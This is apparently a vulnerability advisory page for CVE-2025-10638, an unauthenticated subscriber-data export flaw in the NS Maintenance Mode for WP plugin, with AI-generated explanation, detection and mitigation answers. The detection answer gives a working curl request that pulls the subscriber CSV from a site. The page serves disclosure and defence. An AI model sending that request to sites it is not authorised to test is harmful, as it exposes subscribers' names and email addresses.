CVE-2025-10638
BaseFortify
Publication date: 2025-10-22
Last updated on: 2025-10-22
Assigner: WPScan
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| wordpress | ns_maintenance_mode_for_wp | 1.3.1 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-UNKNOWN |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-10638 is a vulnerability in the NS Maintenance Mode for WP WordPress plugin (up to version 1.3.1) where the subscriber export function lacks proper authorization checks. This flaw allows unauthenticated attackers to send a specially crafted request to the plugin's endpoint and download a CSV file containing all site subscribers' sensitive information, including their names and email addresses. [1]
How can this vulnerability impact me? :
This vulnerability can lead to unauthorized disclosure of subscriber data, exposing names and email addresses to attackers without any authentication. This can result in privacy breaches, spam, phishing attacks targeting subscribers, and damage to the site's reputation. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by checking if the WordPress site is running the NS Maintenance Mode for WP plugin version 1.3.1 or earlier and by testing the subscriber export functionality for unauthorized access. Specifically, you can send an unauthenticated POST request to the endpoint `wp-admin/admin-ajax.php` with the parameter `action=ns_mm_create_csv_subscriber`. If the request returns a CSV file containing subscriber data (names and email addresses) without authentication, the vulnerability is present. Example command using curl: `curl -X POST https://yourwordpresssite.com/wp-admin/admin-ajax.php -d "action=ns_mm_create_csv_subscriber"` and check if subscriber data is returned. [1]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include disabling or removing the NS Maintenance Mode for WP plugin until a patch or fix is available, restricting access to the `wp-admin/admin-ajax.php` endpoint to authenticated users only via server or application-level controls, and monitoring for any unauthorized access attempts to the subscriber export functionality. Since no fix is currently available, limiting exposure and access is critical. [1]